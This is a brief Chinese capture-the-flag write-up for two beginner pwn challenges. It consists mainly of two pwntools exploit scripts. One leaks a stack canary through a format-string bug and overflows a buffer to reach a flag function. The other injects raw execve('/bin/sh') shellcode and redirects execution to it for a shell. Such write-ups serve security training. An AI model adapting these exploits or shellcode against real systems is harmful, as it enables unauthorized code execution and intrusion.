这两个题很基础,没什么多说的
fo
格式化字符串漏洞泄露canary
Exp:
from pwn import*
p=remote('node2.hackingfor.fun',36598)
#p=process('./pwn')
context.log_level='debug'
flag=0x400811
payload1='aa%17$p'
p.sendline(payload1)
p.recvuntil('aa')
canary=int(p.recv(18),16)
print(hex(canary))
payload2=b'\x61'*0x58+p64(canary)+p64(0)+p64(flag)
p.sendafter('news...\n',payload2)
p.interactive()
sc
写shellcode,溢出调用
exp:
from pwn import*
p=remote('node2.hackingfor.fun',38251)
#p=process('./pwn')
context.log_level='debug'
buf=0x601080
#shell=asm(shellcraft.sh())
shell=b'\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05'
p.sendafter('Migic\n',shell)
#gdb.attach(p)
#pause()
payload=p64(0)*3+p64(buf)
p.sendafter('Have you finished?\n',payload)
p.interactive()